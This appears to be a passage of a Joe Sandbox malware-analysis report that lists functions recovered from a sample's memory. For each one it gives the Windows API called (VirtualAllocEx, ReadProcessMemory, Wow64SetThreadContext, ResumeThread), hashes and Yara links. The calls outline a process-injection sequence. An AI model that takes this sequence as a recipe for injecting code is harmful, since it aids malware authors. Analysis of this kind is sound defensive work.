Snapshot File: hcaresult_0_2_13f0000_nD2ozRD7MN.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: a5c2a856803f86ce5eadc1b1a375c1dd2c7baa7c188415fee85e08796da43874
Instruction ID: 3370a7757e14f62b505d56c9d919af8c9ee9ab515e30e432b664b1227457f983
Opcode Fuzzy Hash: a5c2a856803f86ce5eadc1b1a375c1dd2c7baa7c188415fee85e08796da43874
Instruction Fuzzy Hash: 9E21E4B5900249DFDB10CFA9D984ADEBFF4FB48324F14846AE918A3310D375A944DFA1

Function 074EE7F8 Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 074EE878

Memory Dump Source

Source File: 00000000.00000002.2036240745.00000000074E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_74e0000_nD2ozRD7MN.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: d758a2539ba8bfd722da98a06bebe7f1b6335493edd5626ebc108a6172ed1dd1
Instruction ID: 5d0bae8588ac6d0ffd9708c464246699a6e4ece8ad02f3d4d3527f02cdba9eab
Opcode Fuzzy Hash: d758a2539ba8bfd722da98a06bebe7f1b6335493edd5626ebc108a6172ed1dd1
Instruction Fuzzy Hash: 842139B1C003599FDB10CFAAC884AEEFBF5FF48320F50842AE918A7250C7749944DBA4

Function 074EE570 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 074EE5EE

Memory Dump Source

Source File: 00000000.00000002.2036240745.00000000074E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_74e0000_nD2ozRD7MN.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: dab29c937de3473b4b8b757ca274460d77b33b5c76346a0237995fb90fc86928
Instruction ID: dfb822f0d9e8add70044ca9e390c0feee21456098a540e6bb2e4c4e143feb80e
Opcode Fuzzy Hash: dab29c937de3473b4b8b757ca274460d77b33b5c76346a0237995fb90fc86928
Instruction Fuzzy Hash: 8A2149B1D003198FDB10CFAAC8857EEBBF4EF48324F14842AD519A7241DB789944CFA4

Function 013FD788 Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 013FD80F

Memory Dump Source

Source File: 00000000.00000002.2013998323.00000000013F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_13f0000_nD2ozRD7MN.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 79675c5b458c9b5e5893b4808b7e537151acb60b2c975f7cd220688176978a69
Instruction ID: 5b625660b3989da1b0e28565b7991773cc66296407c5237566f5bd536f88308f
Opcode Fuzzy Hash: 79675c5b458c9b5e5893b4808b7e537151acb60b2c975f7cd220688176978a69
Instruction Fuzzy Hash: 0021C2B5900249DFDB10CFAAD984ADEBFF8FB48324F14841AE918A3350D374A944DFA5

Function 0741AF40 Relevance: 1.6, APIs: 1, Instructions: 56windowCOMMON

Download Yara Rule

APIs

CreateIconFromResourceEx.USER32(?,?,?,?,?,?,?,?,?,?,0741C00A,?,?,?,?,?), ref: 0741C0AF

Memory Dump Source

Source File: 00000000.00000002.2035942910.0000000007410000.00000040.00000800.00020000.00000000.sdmp, Offset: 07410000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7410000_nD2ozRD7MN.jbxd

Similarity

API ID: CreateFromIconResource
String ID:
API String ID: 3668623891-0
Opcode ID: 1865315587d92bf9919d102e304b0756a56d1ae3d5e48dd02788d1707aecdccd
Instruction ID: d1bc8076385218e939eeb5202d03b9ec7e5a402520cbef1f2901e14ecaa135e3
Opcode Fuzzy Hash: 1865315587d92bf9919d102e304b0756a56d1ae3d5e48dd02788d1707aecdccd
Instruction Fuzzy Hash: CE1149B6800359DFDB20DF9AC884BDEBFF8EB48320F14845AE914A7210C375A954DFA5

Function 074EE641 Relevance: 1.6, APIs: 1, Instructions: 54memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 074EE6B6

Memory Dump Source

Source File: 00000000.00000002.2036240745.00000000074E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_74e0000_nD2ozRD7MN.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: f6ee33682b9099b7c17ac7afa88590a1ca5a5ce5e70e554c2ad47939c2b8e40a
Instruction ID: 968378f1841649128891dc9531a04755453986989d2ba4e3eaf2a2198d2bb055
Opcode Fuzzy Hash: f6ee33682b9099b7c17ac7afa88590a1ca5a5ce5e70e554c2ad47939c2b8e40a
Instruction Fuzzy Hash: 5F1179B28002499FDF20DFAAC844ADFBFF5EF88324F14881AE519A7250C7759944CFA0

Function 074EE648 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 074EE6B6

Memory Dump Source

Source File: 00000000.00000002.2036240745.00000000074E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_74e0000_nD2ozRD7MN.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 7d8334cb561798a3f9a961a0f760443a7165ac8c458fd5b9ac508e92914ae881
Instruction ID: ec6994089c889bf49597872e7da121392b1edd4594eb8c4b6128f948c5a90a78
Opcode Fuzzy Hash: 7d8334cb561798a3f9a961a0f760443a7165ac8c458fd5b9ac508e92914ae881
Instruction Fuzzy Hash: 1F114C719002599FDB10DFAAC844ADFBFF5EF48324F14841AD515A7250C7759544DFA0

Function 074EDC48 Relevance: 1.6, APIs: 1, Instructions: 52threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 074EDCB2

Memory Dump Source

Source File: 00000000.00000002.2036240745.00000000074E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_74e0000_nD2ozRD7MN.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 9ae7346c4ff2c2ec35418eb991eedccb6bc9de57c35f22c0b93a442f98900f69
Instruction ID: c0895727ff44da7fbc8306f19ef56d6fbfa60b6754e7ae25096724e8c3449c4a
Opcode Fuzzy Hash: 9ae7346c4ff2c2ec35418eb991eedccb6bc9de57c35f22c0b93a442f98900f69
Instruction Fuzzy Hash: E01119B1D002498BDB20DFAAD9456DEBBF8EF98324F14881AD519A7240CB75A544CFA4

Function 074EDC50 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 074EDCB2

Memory Dump Source

Source File: 00000000.00000002.2036240745.00000000074E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_74e0000_nD2ozRD7MN.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 67c5d697cfcac46b793c5cdb24c682e9e918681445110fed646583eacfd450ac
Instruction ID: cdfaeec2575508d91bfc5e777d7de5bdf9b875ce040c553183e7ffc1d405955e
Opcode Fuzzy Hash: 67c5d697cfcac46b793c5cdb24c682e9e918681445110fed646583eacfd450ac
Instruction Fuzzy Hash: AD1128B1D002498FDB20DFAAC8457DEFBF8EF88324F14881AD519A7240CB75A944CFA4

Function 013FB498 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 013FB4FE

Memory Dump Source

Source File: 00000000.00000002.2013998323.00000000013F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_13f0000_nD2ozRD7MN.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 07c5e1a0296c1191cc33294b0a9c087dc2edb77ba93d8eb16caf8b5996e61d51
Instruction ID: 6c314dba44370aef36adf1cbadc847385a0bb4e89c081d94f21b9bf598680130
Opcode Fuzzy Hash: 07c5e1a0296c1191cc33294b0a9c087dc2edb77ba93d8eb16caf8b5996e61d51
Instruction Fuzzy Hash: 8711E3B6C00649CFDB10CF9AC944ADEFBF4EB88314F14841AD529A7214D379A545CFA1

Function 082B005C Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,?), ref: 082B2795

Memory Dump Source

Source File: 00000000.00000002.2037902914.00000000082B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 082B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_82b0000_nD2ozRD7MN.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 1b76fc9c6767c3e54ff8c8d98a04b36d51f3928daf7f9dceb5f0ece85325cb29
Instruction ID: 24677b99f1d115c9440f7bf5b1e021e5263edd3b7f71cbe88398cb1b6817bd32
Opcode Fuzzy Hash: 1b76fc9c6767c3e54ff8c8d98a04b36d51f3928daf7f9dceb5f0ece85325cb29
Instruction Fuzzy Hash: 321106B5800349DFDB10CF99C985BDEBBF8FB58324F108459E514A7200C375A944CFA5

Function 082B2730 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,?), ref: 082B2795

Memory Dump Source

Source File: 00000000.00000002.2037902914.00000000082B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 082B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_82b0000_nD2ozRD7MN.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 89343fae5589b83a87e984fdd162f06fbab1e04b98084f34cbed2147c2ffb131
Instruction ID: 8919c3a3998ccc841b3c74bc733e3ce10bb455c0cb0dfce5d9afd1a33953bae8
Opcode Fuzzy Hash: 89343fae5589b83a87e984fdd162f06fbab1e04b98084f34cbed2147c2ffb131
Instruction Fuzzy Hash: 111103B6800349DFDB10DF99D985BDEBBF8EB48324F10881AD518A7200C375A944CFA1

Function 07F3E7B0 Relevance: 1.4, Strings: 1, Instructions: 151COMMON

Download Yara Rule

Strings

PHeq, xrefs: 07F3E981

Memory Dump Source

Source File: 00000000.00000002.2037425052.0000000007F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7f30000_nD2ozRD7MN.jbxd

Similarity

API ID:
String ID: PHeq
API String ID: 0-2873676430
Opcode ID: dcb2d2238d5efd1432a775d4a2d70882e5172b2937e14718a361b763f9f0d77b
Instruction ID: 85b808b602d1152dae8e9141bcf7e99897c409f3bbc85beb166b6c4504e05535
Opcode Fuzzy Hash: dcb2d2238d5efd1432a775d4a2d70882e5172b2937e14718a361b763f9f0d77b
Instruction Fuzzy Hash: 74515AB0B006468FDB19CF25C998BA9BBB5FF49704F1981A9E446DB362CB31EC44CB50

Function 07F3D570 Relevance: 1.4, Strings: 1, Instructions: 139COMMON

Download Yara Rule

Strings

PHeq, xrefs: 07F3D6EE

Memory Dump Source

Source File: 00000000.00000002.2037425052.0000000007F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7f30000_nD2ozRD7MN.jbxd

Similarity

API ID:
String ID: PHeq
API String ID: 0-2873676430
Opcode ID: 8f05b9e05a7b1e9dfdf9cb240d4aac01a4fc89b972f9bbb9a6b78686c5ca7937
Instruction ID: f61cfe19d7d6466d64694560261699d588739d187a22c99c93e07a75cb664131
Opcode Fuzzy Hash: 8f05b9e05a7b1e9dfdf9cb240d4aac01a4fc89b972f9bbb9a6b78686c5ca7937
Instruction Fuzzy Hash: 7D5114B5B00605CFCB18DF68C598A99BBF1FF49315B2945A8E41AEB3A1DB31EC41CB50

Function 07F3E9AC Relevance: 1.4, Strings: 1, Instructions: 102COMMON

Download Yara Rule

Strings

(iq, xrefs: 07F3E9AD

Memory Dump Source

Source File: 00000000.00000002.2037425052.0000000007F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7f30000_nD2ozRD7MN.jbxd

Similarity

API ID:
String ID: (iq
API String ID: 0-3943945277
Opcode ID: 9de2255013199c04a7a268aad2fa77acdab9ad07ea1626e7d4fc151643c630c5
Instruction ID: 4eacaf6c6f5dd1e781db4e6319fcca70aedcedd04cb38319de66a5eb70c73cb9
Opcode Fuzzy Hash: 9de2255013199c04a7a268aad2fa77acdab9ad07ea1626e7d4fc151643c630c5
Instruction Fuzzy Hash: CC417F707006018FCB65DB38C849B5A77A6FF85724F59C569E46ACB3A1CF70E88ACB40

Function 07F354D8 Relevance: 1.3, Strings: 1, Instructions: 39COMMON

Download Yara Rule

Strings

4'eq, xrefs: 07F35519

Memory Dump Source

Source File: 00000000.00000002.2037425052.0000000007F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7f30000_nD2ozRD7MN.jbxd

Similarity

API ID:
String ID: 4'eq
API String ID: 0-1552367303
Opcode ID: 42c94036c3f58704464434e73227cb58925512907549eb8bafaa0fab264c980d
Instruction ID: 8896e13a5ec8cb274bfd63d15d7352c388867a50f55a6c1c5e3bbc0f698da6e1
Opcode Fuzzy Hash: 42c94036c3f58704464434e73227cb58925512907549eb8bafaa0fab264c980d
Instruction Fuzzy Hash: B401283091428ADFCB0AEBB8D51448E7FB0FF4210476442DDD4558B297DF345905CB82

Function 07F354E8 Relevance: 1.3, Strings: 1, Instructions: 32COMMON

Download Yara Rule

Strings

4'eq, xrefs: 07F35519

Memory Dump Source

Source File: 00000000.00000002.2037425052.0000000007F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7f30000_nD2ozRD7MN.jbxd

Similarity

API ID:
String ID: 4'eq
API String ID: 0-1552367303
Opcode ID: 3b8f5af5a90d9d38d72f83a9987e44100918978c8cc92126acc2bb85856e674d
Instruction ID: 9c594a03f3f9debe5df348364efd07c022d5c859d43b90689c3bd0e3299742db
Opcode Fuzzy Hash: 3b8f5af5a90d9d38d72f83a9987e44100918978c8cc92126acc2bb85856e674d
Instruction Fuzzy Hash: D9F08C30E2020EEFCB09EFB8E65559D7FB1FF44208B6041A9E809D7254EF305A088B41

Function 07F3B62B Relevance: .4, Instructions: 410COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2037425052.0000000007F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7f30000_nD2ozRD7MN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 303a5db08244d003d4b3a5aa108752e8307ec211091fde1ce5aed31fd55b6746
Instruction ID: 284ddbc0e77f284cca6092259f1a5797532c08c502c2ad4e666206ae253c1f54
Opcode Fuzzy Hash: 303a5db08244d003d4b3a5aa108752e8307ec211091fde1ce5aed31fd55b6746
Instruction Fuzzy Hash: 850209B4A00205DFCB49DF68D498A6D7BF2FF89314F5985A8E4099B366CB31EC85CB50

Function 07F33528 Relevance: .2, Instructions: 167COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2037425052.0000000007F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7f30000_nD2ozRD7MN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: de8c67e44aab3464536edb0da5a8af4b7ea16d25752acba2d651bc4a46e95886
Instruction ID: 6a9c493bd027628f246773ba8d8c8c2631d6c00c1b3836d842fe66aedc527ed0
Opcode Fuzzy Hash: de8c67e44aab3464536edb0da5a8af4b7ea16d25752acba2d651bc4a46e95886
Instruction Fuzzy Hash: 45518AB1B10606DFCB15EB68C494B6ABBE6EF89304F18416DE50ADB3A1CB75EC41CB50

Function 07F33518 Relevance: .1, Instructions: 132COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2037425052.0000000007F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7f30000_nD2ozRD7MN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 432225dac9d06106af520137ec9aa08f9183ab4a1ee257f41774708947ed980c
Instruction ID: 8c2fa2861da4ee2e61e5a6769dba26973646159d403ffff8ce1c014f367c4ed3
Opcode Fuzzy Hash: 432225dac9d06106af520137ec9aa08f9183ab4a1ee257f41774708947ed980c
Instruction Fuzzy Hash: 8F419AB0B10606DFCB14EB68C494AAEBBF6EF89304F18412DD5099B3A1CB71EC41CB50

Function 07F35DE8 Relevance: .1, Instructions: 119COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2037425052.0000000007F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7f30000_nD2ozRD7MN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 825280ed42dae8c70d544718a7584c7b540428ac7b090caf46173568c67b21fc
Instruction ID: aefb07d4d8e74e80601f91f3bf1d46c6e6106967b196d2ad65f2d438c098699b
Opcode Fuzzy Hash: 825280ed42dae8c70d544718a7584c7b540428ac7b090caf46173568c67b21fc
Instruction Fuzzy Hash: 574107B1A016019FC725D778C8047AAB7E5EFC5310F58856ED42AC7381CB75E855CB92

Function 07F3C130 Relevance: .1, Instructions: 118COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2037425052.0000000007F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7f30000_nD2ozRD7MN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f1fde3e28fb9e3ff4f61f541441a41da7777fc0a694918c34943f66475621d59
Instruction ID: 83268aebbabb24c5c7a9d8844e733b208e294147a763aadcee604416f1e59ab2
Opcode Fuzzy Hash: f1fde3e28fb9e3ff4f61f541441a41da7777fc0a694918c34943f66475621d59
Instruction Fuzzy Hash: 4A4183B0700601DFCB25EB64C884B7AB3B2FF85314F188569E1469B2A1CB75EC46DBA1

Function 07F3C140 Relevance: .1, Instructions: 117COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2037425052.0000000007F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7f30000_nD2ozRD7MN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: adbf6a9e28c56096dbf93a9b4f2f471ca0ccb4dade6f9e058eb7ff2feab93db0
Instruction ID: 8f76320798a9f68aafede9774ce7324819bc7ccf9250fd67d938e8e48cd81b06
Opcode Fuzzy Hash: adbf6a9e28c56096dbf93a9b4f2f471ca0ccb4dade6f9e058eb7ff2feab93db0
Instruction Fuzzy Hash: 924183B0700601DFCB25EB64C884B7AB3A2FF85314F188529E1469B3A1CF75EC46CBA1

Function 07F38A70 Relevance: .1, Instructions: 107COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2037425052.0000000007F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7f30000_nD2ozRD7MN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d28cf44de7817ff244e58aee3c860b86d8b2ea528de8f2ff86430445e28c40bd
Instruction ID: 8d2e2978baf8bdda62e9dbf5c7ef7849f22c7503e5eb3d63a366da8c64ab0789
Opcode Fuzzy Hash: d28cf44de7817ff244e58aee3c860b86d8b2ea528de8f2ff86430445e28c40bd
Instruction Fuzzy Hash: 8C315BB0710A119FCB15AB38D45962E7BE6FF89211B14866DE01ACB3A0DF34E9068B51

Function 07F38A80 Relevance: .1, Instructions: 102COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2037425052.0000000007F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7f30000_nD2ozRD7MN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3beb9a73e6822dd4ff37d976f16165309cb2ae0c379694a3e786f1532ca444f4
Instruction ID: b478ef17162d70c4f4e0775533739235e8137af0be0209f1a5a8e887c37d79b7
Opcode Fuzzy Hash: 3beb9a73e6822dd4ff37d976f16165309cb2ae0c379694a3e786f1532ca444f4
Instruction Fuzzy Hash: 73313AB07106159FCB15AB38D45862E7BE6FF89311B14866DE01ACB3A0EF34E9068B91

Function 07F3CCE0 Relevance: .1, Instructions: 101COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2037425052.0000000007F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7f30000_nD2ozRD7MN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4fd40b3fbe07cf1188f110f71559f9c8cc7389be3159c94c509e2d12a7ceecda
Instruction ID: eef38a474ab1ac6e755e024fec04d513422812fa671610987666c7c9429cfda5
Opcode Fuzzy Hash: 4fd40b3fbe07cf1188f110f71559f9c8cc7389be3159c94c509e2d12a7ceecda
Instruction Fuzzy Hash: DD3137B57006028FCB14DB39C884B6AB7A6FF88714F1984A9E41ACB3A1DE34EC41DB50

Function 07F3FD38 Relevance: .1, Instructions: 99COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2037425052.0000000007F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7f30000_nD2ozRD7MN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 31d9415ba80db1c13bccbe1bf11d1e44b6eeb835f876f5cf10ff04994dee19ae
Instruction ID: d4346fc83bb12f5cbc21d9c79fa4511c03f237ac99f32ec06cc1887c0496e538
Opcode Fuzzy Hash: 31d9415ba80db1c13bccbe1bf11d1e44b6eeb835f876f5cf10ff04994dee19ae
Instruction Fuzzy Hash: 04313AB5B002159FCB14DF68C984AAD7BB6FF88620F144669E925DB3B1CB71DD02CB90

Function 07F3FD48 Relevance: .1, Instructions: 95COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2037425052.0000000007F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7f30000_nD2ozRD7MN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1e78128b5aff8001c18182e6320fc5ba227a40b81780ba0a4bd36dbe81cce2b6
Instruction ID: e6920a458d6f4af7837b0373f4581d64ae352e988a2f844eb5d8ce7e7578b3f1
Opcode Fuzzy Hash: 1e78128b5aff8001c18182e6320fc5ba227a40b81780ba0a4bd36dbe81cce2b6
Instruction Fuzzy Hash: BF311AB5B102159FCB14DF68C888A6D7BB6FF88620F144269E525DB3B1CB71DC41CB90

Function 07F3D2C0 Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2037425052.0000000007F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7f30000_nD2ozRD7MN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d616fb342d4d9dbc034a4ad914177992b0984a359a18775275672938ad44d4d7
Instruction ID: 96ca76e4a7e3fc2f8632afeb45821e988567a9022f4d78126d70000ea95edcf1
Opcode Fuzzy Hash: d616fb342d4d9dbc034a4ad914177992b0984a359a18775275672938ad44d4d7
Instruction Fuzzy Hash: 493137B57006018FC715DB28C884BAA73B5FF88714F1A84A9E44ACB371DB34EC41CB50

Function 07F37ED8 Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2037425052.0000000007F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7f30000_nD2ozRD7MN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 65479a3c3256807c056c306dd2da9c4b23ea19b1b43d27d103feb2bf9609c297
Instruction ID: be8338c710beb0f438776a0cc3adabc66d8256b61dbeb9159fdac7c817a136c2
Opcode Fuzzy Hash: 65479a3c3256807c056c306dd2da9c4b23ea19b1b43d27d103feb2bf9609c297
Instruction Fuzzy Hash: 2E3170B07105058F8B15AB3AC48956E7FE6FFC97117588569E41ACB3A0DF30EC01CB91

Function 07F36589 Relevance: .1, Instructions: 90COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2037425052.0000000007F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7f30000_nD2ozRD7MN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 05b7f8837fbe3dda0b42b689812fd74f80e209b1a06bd335fb5638d869ba56fc
Instruction ID: 2839d0c21170de088261070b7f56b0ced8521284962f0d20e317eb701c0f3b60
Opcode Fuzzy Hash: 05b7f8837fbe3dda0b42b689812fd74f80e209b1a06bd335fb5638d869ba56fc
Instruction Fuzzy Hash: 69311675A00604CFC709DF68C484A8AB7F2FF8C324F1984A9D405AB361CB31EC86CB21

Function 07F37EC8 Relevance: .1, Instructions: 88COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2037425052.0000000007F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7f30000_nD2ozRD7MN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 599cf5c1635b39d2300634943a58e035bbcce512638ae56dc8d0f7050a195bf6
Instruction ID: 576e9d5848858aafcba47207b1551ed8afa8d4d311dc30743bf5505f8660a9f6
Opcode Fuzzy Hash: 599cf5c1635b39d2300634943a58e035bbcce512638ae56dc8d0f7050a195bf6
Instruction Fuzzy Hash: 46314FB57005018FCB15AB35D49996D7FEAFF85711B088559E416CB7A0DF30EC01DB91

Function 07F33864 Relevance: .1, Instructions: 88COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2037425052.0000000007F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7f30000_nD2ozRD7MN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3dc5d5b2e433f7be8c597977cd15c2ef3d9462cc73c25ffbaf0cce71fbc93fb8
Instruction ID: a51adb236d0d056993189111d1984324ca6d9b5b00b4b1cc30a84af3170200d4
Opcode Fuzzy Hash: 3dc5d5b2e433f7be8c597977cd15c2ef3d9462cc73c25ffbaf0cce71fbc93fb8
Instruction Fuzzy Hash: B8311579A20219DFCB04DFA8D884EACB7B5FF88700B0585A9E905AB360C730A800CB50

Function 07F34528 Relevance: .1, Instructions: 86COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2037425052.0000000007F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7f30000_nD2ozRD7MN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4a22b295e40930a91867e6a6688a96326df1f1a78aa9b797a069708bd16db276
Instruction ID: c94461e3532b3c2290556dd196286eb8dcc28b0b1913f37b49878c5468f78f28
Opcode Fuzzy Hash: 4a22b295e40930a91867e6a6688a96326df1f1a78aa9b797a069708bd16db276
Instruction Fuzzy Hash: B721C1B6B102428FCB44DB2DD41497E73E9EF8962171940AAD909CB361EF31DC01CBA0

Function 07F3CFC0 Relevance: .1, Instructions: 84COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2037425052.0000000007F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7f30000_nD2ozRD7MN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3d527c711337924eeac810b0bb280e89e4467c08a8e4a54d400a4810fe512761
Instruction ID: bd7fa4ed36d41dd29af86fb2d67608b0ed87986e9eb0d994e802ec5a8a8989cd
Opcode Fuzzy Hash: 3d527c711337924eeac810b0bb280e89e4467c08a8e4a54d400a4810fe512761
